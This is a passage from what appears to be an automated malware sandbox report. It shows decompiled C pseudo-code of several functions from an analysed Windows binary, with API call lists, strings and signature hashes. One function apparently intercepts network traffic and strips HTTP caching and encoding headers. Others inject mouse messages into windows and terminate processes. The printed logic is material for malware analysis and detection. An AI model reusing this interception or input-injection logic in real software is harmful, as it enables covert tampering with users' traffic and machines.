				signed int _v108;
				void* _v112;
				void* _v132;
				void* __esi;
				signed int _t111;
				signed int _t113;
				signed char _t114;
				signed int _t115;
				void* _t117;
				signed char _t121;
				signed int _t122;
				signed int _t125;
				signed int _t128;
				signed char _t130;
				signed char _t136;
				intOrPtr _t149;
				void* _t165;
				signed char _t166;
				void* _t172;
				intOrPtr _t178;
				signed int _t184;
				void* _t186;
				void* _t188;
				signed int _t202;
				signed int _t203;
				signed int _t205;
				void* _t207;

				_t207 = (_t205 & 0xfffffff8) - 0x5c;
				if(E004068C0() == 0 || _a8 == 0 || _a12 <= 0) {
					L9:
					_t111 =  *0x422f9c(_a4, _a8, _a12);
					goto L10;
				} else {
					EnterCriticalSection(0x422fac);
					_t192 = _a4;
					_t184 = E0040C3C0(_a4);
					_v84 = _t184;
					if(_t184 == 0xffffffff) {
						L8:
						LeaveCriticalSection(0x422fac);
						goto L9;
					}
					_t186 = _t184 * 0x38 +  *0x422fc8;
					if( *(_t186 + 0x20) > 0) {
						L29:
						_t113 =  *(_t186 + 0x24);
						_t188 =  *(_t186 + 0x20) - _t113;
						LeaveCriticalSection(0x422fac);
						_t195 = _a4;
						_t114 =  *0x422f9c(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
						_v88 = _t114;
						__eflags = _t114 - 0xffffffff;
						if(_t114 != 0xffffffff) {
							EnterCriticalSection(0x422fac);
							_t115 = E0040C3C0(_t195);
							__eflags = _t115 - 0xffffffff;
							if(_t115 != 0xffffffff) {
								_t166 = _v88;
								_t117 = _t115 * 0x38 +  *0x422fc8;
								__eflags = _t166 - _t188;
								if(_t166 != _t188) {
									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
									_t92 = _t117 + 0x28;
									 *_t92 =  *(_t117 + 0x28) - 1;
									__eflags =  *_t92;
									_v88 = 1;
								} else {
									_t88 = _t117 + 0x1c; // -4337580
									_v88 =  *(_t117 + 0x28);
									E004164D4(E00416421( *_t88), _t88, 0, 0x10);
								}
							} else {
								_v88 = _v88 | _t115;
								 *0x422fa8(0xffffe890, 8);
							}
							LeaveCriticalSection(0x422fac);
						}
						L36:
						_t111 = _v88;
						L10:
						return _t111;
					}
					if( *(_t186 + 8) > 0) {
						L38:
						LeaveCriticalSection(0x422fac);
						_t197 = _a4;
						_t121 =  *0x422f9c(_a4, _a8, _a12);
						_v88 = _t121;
						__eflags = _t121 - 0xffffffff;
						if(_t121 != 0xffffffff) {
							EnterCriticalSection(0x422fac);
							_t122 = E0040C3C0(_t197);
							__eflags = _t122 - 0xffffffff;
							if(_t122 != 0xffffffff) {
								_t172 = _t122 * 0x38 +  *0x422fc8;
								_t178 =  *((intOrPtr*)(_t172 + 8));
								__eflags = _v88 - _t178;
								if(_v88 > _t178) {
									E0040C47E(_t122);
								} else {
									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
								}
							} else {
								_v88 = _v88 | _t122;
								 *0x422fa8(0xffffe890, 8);
							}
							LeaveCriticalSection(0x422fac);
						}
						goto L36;
					}
					_t125 = E0040C8B4( &_v76, _t192, _a8, _a12);
					_v92 = _t125;
					if(_t125 != 0xffffffff) {
						__eflags = _v72;
						if(_v72 == 0) {
							L37:
							E00410A15( &_v76);
							_t128 = _v80 + _a12;
							__eflags = _t128;
							 *(_t186 + 8) = _t128;
							goto L38;
						}
						_t130 = E004100E7( &_v76);
						_v88 = _t130;
						__eflags = _t130 & 0x00000001;
						if((_t130 & 0x00000001) == 0) {
							_v92 = 0;
							_v88 = 0;
							__eflags = _t130 & 0x00000002;
							if(__eflags != 0) {
								_t203 = E00416474(__eflags, _a8, _a12);
								 *(_t207 + 0x10) = _t203;
								__eflags = _t203;
								if(_t203 != 0) {
									E00410A7F( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
									E00416421( *(_t186 + 0x14));
									E00416421( *((intOrPtr*)(_t186 + 4)));
									_t149 = E0041687F(_v76, _v80);
									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
									_t38 = _t186 + 0x18;
									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
									__eflags =  *_t38;
									 *((intOrPtr*)(_t186 + 4)) = _t149;
									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
									 *((intOrPtr*)(_t186 + 0x10)) =  *((intOrPtr*)(_t207 + 0x68));
									 *((intOrPtr*)(_t207 + 0x14)) = E0041B351(E0041B351(E0041B3CD(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
								} else {
									E00410A7F( *((intOrPtr*)(_t207 + 0x60)), _v20);
								}
							}
							__eflags = _v84 & 0x00000004;
							if((_v84 & 0x00000004) == 0) {
								L27:
								__eflags = _v92;
								if(_v92 == 0) {
									goto L37;
								}
								E00410A15( &_v76);
								_t70 = _t186 + 0x24;
								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
								__eflags =  *_t70;
								 *(_t186 + 8) = _v80;
								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
								 *(_t186 + 0x20) = _v88;
								 *(_t186 + 0x28) = _a12;
								goto L29;
							}
							_t202 = _v92;
							__eflags = _t202;
							if(__eflags != 0) {
								_t136 = _v88;
							} else {
								_t202 = _a8;
								_t136 = _a12;
							}
							_v84 = _t136;
							_v104 = E0040CB94(_v84, __eflags, _t202, _v40, _v36,  &_v92);
							E00416421( *((intOrPtr*)(_t207 + 0x44)));
							__eflags = _v108;
							if(_v108 != 0) {
								__eflags = _t202 - _a8;
								if(_t202 != _a8) {
									E00416421(_t202);
								}
							} else {
								__eflags = _t202 - _a8;
								if(_t202 == _a8) {
									goto L37;
								}
								_v92 = _t202;
								_v88 = _v84;
							}
							goto L27;
						} else {
							E00410A15( &_v76);
							LeaveCriticalSection(0x422fac);
							_t111 =  *0x422fa8(0xffffe8a3, 0) | 0xffffffff;
							goto L10;
						}
					} else {
						E0040C47E(_v84);
						E00410A15( &_v76);
						goto L8;
					}
				}
			}

0x0040d342
0x0040d34f
0x0040d3c7
0x0040d3d0
0x00000000
0x0040d35d
0x0040d363
0x0040d369
0x0040d371
0x0040d373
0x0040d37a
0x0040d3c0
0x0040d3c1
0x00000000
0x0040d3c1
0x0040d37f
0x0040d389
0x0040d565
0x0040d565
0x0040d571
0x0040d573
0x0040d57b
0x0040d57f
0x0040d588
0x0040d58c
0x0040d58f
0x0040d592
0x0040d598
0x0040d59d
0x0040d5a0
0x0040d5b7
0x0040d5be
0x0040d5c4
0x0040d5c6
0x0040d5e5
0x0040d5e8
0x0040d5e8
0x0040d5e8
0x0040d5eb
0x0040d5c8
0x0040d5cb
0x0040d5d0
0x0040d5de
0x0040d5de
0x0040d5a2
0x0040d5a2
0x0040d5ad
0x0040d5b4
0x0040d5f4
0x0040d5f4
0x0040d5fa
0x0040d5fa
0x0040d3d9
0x0040d3df
0x0040d3df
0x0040d393
0x0040d616
0x0040d61d
0x0040d622
0x0040d629
0x0040d632
0x0040d636
0x0040d639
0x0040d63c
0x0040d642
0x0040d647
0x0040d64a
0x0040d666
0x0040d66c
0x0040d66f
0x0040d673
0x0040d67e
0x0040d675
0x0040d679
0x0040d679
0x0040d64c
0x0040d64c
0x0040d657
0x0040d65e
0x0040d684
0x0040d684
0x00000000
0x0040d639
0x0040d3a4
0x0040d3a9
0x0040d3b0
0x0040d3e2
0x0040d3e6
0x0040d603
0x0040d607
0x0040d610
0x0040d610
0x0040d613
0x00000000
0x0040d613
0x0040d3f1
0x0040d3f6
0x0040d3fa
0x0040d3fc
0x0040d422
0x0040d426
0x0040d42a
0x0040d42c
0x0040d43d
0x0040d43f
0x0040d443
0x0040d445
0x0040d45c
0x0040d464
0x0040d46c
0x0040d479
0x0040d47e
0x0040d482
0x0040d482
0x0040d482
0x0040d48b
0x0040d49a
0x0040d4a2
0x0040d4c2
0x0040d447
0x0040d44f
0x0040d44f
0x0040d445
0x0040d4c6
0x0040d4cb
0x0040d532
0x0040d532
0x0040d537
0x00000000
0x00000000
0x0040d541
0x0040d54a
0x0040d54a
0x0040d54a
0x0040d54e
0x0040d555
0x0040d55c
0x0040d562
0x00000000
0x0040d562
0x0040d4cd
0x0040d4d1
0x0040d4d3
0x0040d4dd
0x0040d4d5
0x0040d4d5
0x0040d4d8
0x0040d4d8
0x0040d4e1
0x0040d500
0x0040d504
0x0040d509
0x0040d50e
0x0040d527
0x0040d52a
0x0040d52d
0x0040d52d
0x0040d510
0x0040d510
0x0040d513
0x00000000
0x00000000
0x0040d51d
0x0040d521
0x0040d521
0x00000000
0x0040d3fe
0x0040d402
0x0040d408
0x0040d41d
0x00000000
0x0040d41d
0x0040d3b2
0x0040d3b6
0x0040d3bb
0x00000000
0x0040d3bb
0x0040d3b0

APIs

Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8

EnterCriticalSection.KERNEL32(00422FAC), ref: 0040D363
LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D3C1
LeaveCriticalSection.KERNEL32(00422FAC,?), ref: 0040D408
LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D573
EnterCriticalSection.KERNEL32(00422FAC), ref: 0040D592
LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D5F4
LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D61D
EnterCriticalSection.KERNEL32(00422FAC), ref: 0040D63C
LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D684

Strings

If-Modified-Since, xrefs: 0040D4B6
Accept-Encoding, xrefs: 0040D492
identity, xrefs: 0040D486

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$ObjectSingleWait
String ID: Accept-Encoding$If-Modified-Since$identity
API String ID: 3286975823-3034467039
Opcode ID: a82a7ffa15f3f7e27cec8f4d138502100ef769a82ccdc260df0ec2ed83df59ba
Instruction ID: 03dd137094fcee7b82c66184d154036a8e17c3421522a32bba14c01c24d67de6
Opcode Fuzzy Hash: a82a7ffa15f3f7e27cec8f4d138502100ef769a82ccdc260df0ec2ed83df59ba
Instruction Fuzzy Hash: 3BA19D71904301EFCB10DF64DD45A5EBBF0BF88314F104A2AF855A72A1C778E999CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408309, Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408309(void** __eax, char _a4) {
				void* __esi;
				void* _t15;
				void* _t16;
				long _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				struct HDC__* _t23;
				void* _t24;
				void* _t25;
				void** _t41;

				_t41 = __eax;
				_t1 =  &(_t41[7]); // 0x0
				_t15 =  *_t1;
				if(_t15 != 0) {
					DeleteObject(_t15);
				}
				_t2 =  &(_t41[3]); // 0x0
				_t16 =  *_t2;
				if(_t16 != 0) {
					CloseHandle(_t16);
				}
				_t3 =  &(_t41[1]); // 0x0
				_t17 =  *_t3;
				if(_t17 != 0xffffffff) {
					TlsFree(_t17);
				}
				_t4 =  &(_t41[5]); // 0x0
				_t18 =  *_t4;
				if(_t18 != 0) {
					CloseHandle(_t18);
				}
				_t5 =  &(_t41[4]); // 0x0
				_t19 =  *_t5;
				if(_t19 != 0) {
					UnmapViewOfFile(_t19);
				}
				_t20 =  *_t41;
				if(_t20 != 0) {
					_t20 = CloseHandle(_t20);
				}
				if(_a4 != 0) {
					_t7 =  &(_t41[0x56]); // 0x0
					_t21 =  *_t7;
					if(_t21 != 0) {
						_t8 =  &(_t41[0x55]); // 0x0
						SelectObject( *_t8, _t21);
					}
					_t9 =  &(_t41[0x57]); // 0x0
					_t22 =  *_t9;
					if(_t22 != 0) {
						DeleteObject(_t22);
					}
					_t10 =  &(_t41[0x55]); // 0x0
					_t23 =  *_t10;
					if(_t23 != 0) {
						DeleteDC(_t23);
					}
					_t11 =  &(_t41[0x58]); // 0x0
					_t24 =  *_t11;
					if(_t24 != 0) {
						CloseHandle(_t24);
					}
					_t12 =  &(_t41[0x60]); // 0x0
					_t25 =  *_t12;
					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
						_t13 =  &(_t41[0x62]); // 0x0
						PostThreadMessageW( *_t13, 0x12, 0, 0);
					}
					_t20 = E00417E30( &(_t41[0x5f]));
				}
				return _t20;
			}

0x00408311
0x00408313
0x00408313
0x00408319
0x0040831c
0x0040831c
0x0040831e
0x0040831e
0x00408329
0x0040832c
0x0040832c
0x0040832e
0x0040832e
0x00408334
0x00408337
0x00408337
0x0040833d
0x0040833d
0x00408342
0x00408345
0x00408345
0x00408347
0x00408347
0x0040834c
0x0040834f
0x0040834f
0x00408355
0x00408359
0x0040835c
0x0040835c
0x00408363
0x00408365
0x00408365
0x0040836d
0x00408370
0x00408376
0x00408376
0x0040837c
0x0040837c
0x00408384
0x00408387
0x00408387
0x00408389
0x00408389
0x00408391
0x00408394
0x00408394
0x0040839a
0x0040839a
0x004083a2
0x004083a5
0x004083a5
0x004083a7
0x004083a7
0x004083af
0x004083c7
0x004083cd
0x004083cd
0x004083d9
0x004083d9
0x004083e1

APIs

DeleteObject.GDI32(00000000), ref: 0040831C
CloseHandle.KERNEL32(00000000,00000000,00422E10,00000000,00408510,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040832C
TlsFree.KERNEL32(00000000,00000000,00422E10,00000000,00408510,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00408337
CloseHandle.KERNEL32(00000000,00000000,00422E10,00000000,00408510,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00408345
UnmapViewOfFile.KERNEL32(00000000,00000000,00422E10,00000000,00408510,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040834F
CloseHandle.KERNEL32(00000000,00000000,00422E10,00000000,00408510,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040835C
SelectObject.GDI32(00000000,00000000), ref: 00408376
DeleteObject.GDI32(00000000), ref: 00408387
DeleteDC.GDI32(00000000), ref: 00408394
CloseHandle.KERNEL32(00000000,00000000,00422E10,00000000,00408510,00000000,00000000), ref: 004083A5
WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00422E10,00000000,00408510,00000000,00000000), ref: 004083B4
PostThreadMessageW.USER32 ref: 004083CD

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
String ID:
API String ID: 1699860549-0
Opcode ID: d834e73421e69595f93be6843176a9cb2a2099d2cf137fd9d80b9da7c1939bc8
Instruction ID: eaa215e9056629facd5298c74796b916b689ba92ef4e8b992160449a7b0236ef
Opcode Fuzzy Hash: d834e73421e69595f93be6843176a9cb2a2099d2cf137fd9d80b9da7c1939bc8
Instruction Fuzzy Hash: 3021FA706007049BD7209B79DE48B97B7EDAF84B41F04493EB995F76E0DB79E8408A28

Uniqueness

Uniqueness Score: -1.00%

Function 004094F1, Relevance: 16.6, APIs: 11, Instructions: 118
synchronizationthreadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004094F1(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
				char _v5;
				long _v12;
				signed char _v16;
				struct tagRECT _v32;
				char _v140;
				void* __ebx;
				void* __esi;
				signed char _t47;
				intOrPtr _t52;
				void* _t85;
				RECT* _t89;

				_t89 = __edi;
				_t86 = __ecx;
				_t85 = __eax;
				_t47 = E00408037(_a4) & 0x0000ffff;
				_v16 = _t47;
				if((_t47 & 0x00000001) != 0) {
					L16:
					return 1;
				}
				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
					_v5 = 0;
				} else {
					_t7 = _t85 + 0x50; // 0x50
					_t9 = _t85 + 0x3c; // 0x3c
					_t86 =  &_v140;
					E0041AA7A( &_v140, _t9, _v12, _t7, 2);
					_v5 = E00419C04( &_v140);
				}
				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
					L8:
					if(E0040938F(_t85, _t86) == 0) {
						L14:
						_t52 = _a8;
						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
							IntersectRect( &_v32, _t52 + 4, _t89);
							FillRect( *(_t85 + 0x154),  &_v32, 6);
							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
						}
						goto L16;
					}
					E0041645D( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
					ResetEvent( *(_t85 + 0xc));
					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
						goto L14;
					}
					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
						_t35 = _t85 + 0x17c; // 0x17c
						TerminateProcess( *_t35, 0);
						E00417E30(_t35);
						goto L14;
					}
					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
						goto L14;
					}
					return _v5;
				} else {
					ResetEvent( *(_t85 + 0xc));
					_t86 = _t89->left & 0x0000ffff;
					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
						goto L8;
					} else {
						goto L16;
					}
				}
			}

0x004094f1
0x004094f1
0x004094ff
0x00409506
0x00409509
0x0040950e
0x0040965a
0x00000000
0x0040965a
0x00409523
0x00409551
0x00409525
0x00409527
0x0040952e
0x00409535
0x0040953b
0x0040954c
0x0040954c
0x0040955f
0x004095aa
0x004095b1
0x00409619
0x00409619
0x00409623
0x0040962e
0x00409640
0x00409654
0x00409654
0x00000000
0x00409623
0x004095bf
0x004095c7
0x004095df
0x00000000
0x00000000
0x004095f1
0x00409606
0x0040960e
0x00409614
0x00000000
0x00409614
0x004095fd
0x00000000
0x00000000
0x00000000
0x00409567
0x0040956a
0x00409579
0x00409595
0x00000000
0x00000000
0x00000000
0x00000000
0x00409595

APIs

Part of subcall function 00408037: GetClassNameW.USER32 ref: 00408052

GetWindowThreadProcessId.USER32(?,?), ref: 0040951B
ResetEvent.KERNEL32(?), ref: 0040956A
PostMessageW.USER32(?,?,?,?), ref: 0040958D
WaitForSingleObject.KERNEL32(?,00000064), ref: 0040959C
ResetEvent.KERNEL32(?,?,?,00000010), ref: 004095C7
PostThreadMessageW.USER32 ref: 004095D7
WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 004095E9

Part of subcall function 0041AA7A: StringFromGUID2.OLE32(?,2937498D,00000028,?,?,00000010,00000000,77E49EB0), ref: 0041AB20

Part of subcall function 00419C04: OpenMutexW.KERNEL32(00100000,00000000,00000000,004070EF,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 00419C0F
Part of subcall function 00419C04: CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00419C1A

TerminateProcess.KERNEL32(0000017C,00000000,?,00000010), ref: 0040960E

Part of subcall function 00417E30: CloseHandle.KERNEL32(00000000,74B5F560,004083DE,00000000,00422E10,00000000,00408510,00000000,00000000), ref: 00417E3F
Part of subcall function 00417E30: CloseHandle.KERNEL32(00000000,74B5F560,004083DE,00000000,00422E10,00000000,00408510,00000000,00000000), ref: 00417E48

IntersectRect.USER32 ref: 0040962E
FillRect.USER32 ref: 00409640
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00409654

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
String ID:
API String ID: 2453266691-0
Opcode ID: 9cdada03d9b15558c28fbaf7133e0955164b631a5afa0fbd5879e739418eccc5
Instruction ID: 52000164b2bb1804357d02d8f88a082b6ea16886f9a7358d98d01ef7967112f6
Opcode Fuzzy Hash: 9cdada03d9b15558c28fbaf7133e0955164b631a5afa0fbd5879e739418eccc5
Instruction Fuzzy Hash: F841B031500204BBEF11AFA5DD44BEA7BB8AF04305F0480B6F944FA1A2D73ACD55DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00407A82, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00407A82(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
				struct HWND__* _v8;
				char _v12;
				struct HWND__* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				intOrPtr _v68;
				struct tagWINDOWINFO _v92;
				void* __ebx;
				void* __esi;
				intOrPtr _t107;
				struct HWND__* _t108;
				int _t113;
				int _t114;
				signed char _t143;
				struct HWND__* _t144;
				long _t147;
				struct HWND__* _t170;
				long _t171;
				void* _t174;

				_t174 = __eax;
				_t107 =  *((intOrPtr*)(__eax + 0x10));
				_v16 = 0;
				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
					_t108 =  *((intOrPtr*)(_t107 + 0x108));
					_v16 = _t108;
					if(_t108 != 0) {
						_v32 = E004083E4(0, __eax, 0) & 0x0000ffff;
					} else {
						_v32 = 0;
					}
				} else {
					if((_a4 & 0x00000001) != 0) {
						E004075F4(_a12, _a8, __eax);
						_a4 = _a4 & 0xfffffffe;
					}
					if((_a4 & 0x00000004) != 0) {
						E00407585(0, _t174, 0, 0, 1);
					}
				}
				_t143 = _a4;
				 *( *(_t174 + 0x10) + 0x100) = _a8;
				_t113 =  *(_t174 + 0x10);
				 *(_t113 + 0x104) = _a12;
				if(_t143 == 0) {
					L69:
					return _t113;
				}
				_v20 = _t143;
				_t26 =  &_v20;
				 *_t26 = _v20 & 0x00000002;
				if( *_t26 == 0) {
					if((_t143 & 0x00000004) == 0) {
						goto L14;
					} else {
						_push(0);
						goto L13;
					}
				} else {
					_push(1);
					L13:
					E004083E4(1, _t174);
					L14:
					_v24 = _t143;
					_t31 =  &_v24;
					 *_t31 = _v24 & 0x00000020;
					if( *_t31 == 0) {
						if((_t143 & 0x00000040) == 0) {
							L19:
							_v28 = _t143;
							_t36 =  &_v28;
							 *_t36 = _v28 & 0x00000008;
							if( *_t36 == 0) {
								if((_t143 & 0x00000010) == 0) {
									L24:
									_t114 =  *(_t174 + 0x10);
									_push( *((intOrPtr*)(_t114 + 0x104)));
									_push( *((intOrPtr*)(_t114 + 0x100)));
									0xc00000 = 0x64;
									_t170 = E0041AB5D(0xc00000,  &_v12);
									_t113 = _v12 + 0xfffffff6;
									_v8 = _t170;
									if(_t113 <= 7) {
										_t113 = GetWindowLongW(_t170, 0xfffffff0);
										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
											_t113 = GetParent(_t170);
											if(_t113 != 0) {
												_v8 = _t113;
												_t170 = _t113;
											}
										}
									}
									if(_t170 == 0) {
										L35:
										_t144 = _v16;
										if(_t144 != 0) {
											_t113 = IsWindow(_t144);
											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
												if(_a4 != 0x8001) {
													_t113 = E00407585(0, _t174, 0, 0, 1);
												}
											} else {
												_v8 = _t144;
												_v12 = 1;
												_t170 = _t144;
											}
										}
										goto L43;
									} else {
										_t113 = E00408037(_t170);
										if((_t113 & 0x00000040) == 0) {
											goto L35;
										}
										if(_t170 != _v16) {
											_t113 = E00407585(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
										}
										_v12 = 1;
										L43:
										if(_t170 == 0) {
											goto L69;
										}
										_v92.cbSize = 0x3c;
										_t113 = GetWindowInfo(_t170,  &_v92);
										if(_t113 == 0) {
											goto L69;
										}
										_t113 = _a8 & 0x0000ffff;
										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
										if(_v12 != 1) {
											_t171 = _a4;
										} else {
											_t113 = E00408037(_t170);
											if((_t113 & 0x00000020) == 0) {
												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
											} else {
												_t171 = _t147;
											}
										}
										if(_v20 == 0) {
											if((_a4 & 0x00000004) == 0) {
												goto L55;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa2);
											_push(0x202);
											goto L54;
										} else {
											_push(_t147);
											_push(_t171);
											_push(0xa1);
											_push(0x201);
											L54:
											_push(_v12);
											_push( &_v92);
											_push(_v8);
											_t113 = E004077F4(_t174, 0xc00000);
											L55:
											if(_v24 == 0) {
												if((_a4 & 0x00000040) == 0) {
													L60:
													if(_v28 == 0) {
														if((_a4 & 0x00000010) == 0) {
															L65:
															if((_a4 & 0x00000001) != 0) {
																_t113 = E004077F4(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
															}
															if((_a4 & 0x00000800) != 0) {
																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E004083E4(0, _t174, 0) & 0x0000ffff, _t147);
															}
															goto L69;
														}
														_push(_t147);
														_push(_t171);
														_push(0xa5);
														_push(0x205);
														L64:
														_push(_v12);
														_push( &_v92);
														_push(_v8);
														_t113 = E004077F4(_t174, 0xc00000);
														goto L65;
													}
													_push(_t147);
													_push(_t171);
													_push(0xa4);
													_push(0x204);
													goto L64;
												}
												_push(_t147);
												_push(_t171);
												_push(0xa8);
												_push(0x208);
												L59:
												_push(_v12);
												_push( &_v92);
												_push(_v8);
												_t113 = E004077F4(_t174, 0xc00000);
												goto L60;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa7);
											_push(0x207);
											goto L59;
										}
									}
								}
								_push(0);
								L23:
								E004083E4(2, _t174);
								goto L24;
							}
							_push(1);
							goto L23;
						}
						_push(0);
						L18:
						E004083E4(4, _t174);
						goto L19;
					}
					_push(1);
					goto L18;
				}
			}

0x00407a8a
0x00407a8c
0x00407a92
0x00407a9c
0x00407ac8
0x00407ace
0x00407ad3
0x00407ae7
0x00407ad5
0x00407ad5
0x00407ad5
0x00407a9e
0x00407aa2
0x00407aac
0x00407ab1
0x00407ab1
0x00407ab9
0x00407ac1
0x00407ac1
0x00407ab9
0x00407af0
0x00407af3
0x00407af9
0x00407aff
0x00407b07
0x00407d8b
0x00407d8f
0x00407d8f
0x00407b0d
0x00407b10
0x00407b10
0x00407b14
0x00407b1d
0x00000000
0x00407b1f
0x00407b1f
0x00000000
0x00407b1f
0x00407b16
0x00407b16
0x00407b20
0x00407b24
0x00407b29
0x00407b29
0x00407b2c
0x00407b2c
0x00407b30
0x00407b39
0x00407b45
0x00407b45
0x00407b48
0x00407b48
0x00407b4c
0x00407b55
0x00407b61
0x00407b61
0x00407b64
0x00407b6d
0x00407b75
0x00407b7b
0x00407b80
0x00407b83
0x00407b89
0x00407b8e
0x00407b99
0x00407bb0
0x00407bb8
0x00407bba
0x00407bbd
0x00407bbd
0x00407bb8
0x00407b99
0x00407bc1
0x00407bf0
0x00407bf0
0x00407bf5
0x00407bf8
0x00407c00
0x00407c25
0x00407c2f
0x00407c2f
0x00407c10
0x00407c10
0x00407c13
0x00407c1a
0x00407c1a
0x00407c00
0x00000000
0x00407bc3
0x00407bc4
0x00407bcb
0x00000000
0x00000000
0x00407bd0
0x00407be2
0x00407be2
0x00407be7
0x00407c34
0x00407c36
0x00000000
0x00000000
0x00407c41
0x00407c48
0x00407c50
0x00000000
0x00000000
0x00407c5a
0x00407c61
0x00407c67
0x00407c90
0x00407c69
0x00407c6a
0x00407c71
0x00407c89
0x00407c8c
0x00407c73
0x00407c73
0x00407c73
0x00407c71
0x00407c97
0x00407cab
0x00000000
0x00000000
0x00407cad
0x00407cae
0x00407caf
0x00407cb4
0x00000000
0x00407c99
0x00407c99
0x00407c9a
0x00407c9b
0x00407ca0
0x00407cb9
0x00407cb9
0x00407cbf
0x00407cc0
0x00407cc5
0x00407cca
0x00407cce
0x00407ce2
0x00407d01
0x00407d05
0x00407d19
0x00407d38
0x00407d3c
0x00407d56
0x00407d56
0x00407d62
0x00407d85
0x00407d85
0x00000000
0x00407d62
0x00407d1b
0x00407d1c
0x00407d1d
0x00407d22
0x00407d27
0x00407d27
0x00407d2d
0x00407d2e
0x00407d33
0x00000000
0x00407d33
0x00407d07
0x00407d08
0x00407d09
0x00407d0e
0x00000000
0x00407d0e
0x00407ce4
0x00407ce5
0x00407ce6
0x00407ceb
0x00407cf0
0x00407cf0
0x00407cf6
0x00407cf7
0x00407cfc
0x00000000
0x00407cfc
0x00407cd0
0x00407cd1
0x00407cd2
0x00407cd7
0x00000000
0x00407cd7
0x00407c97
0x00407bc1
0x00407b57
0x00407b58
0x00407b5c
0x00000000
0x00407b5c
0x00407b4e
0x00000000
0x00407b4e
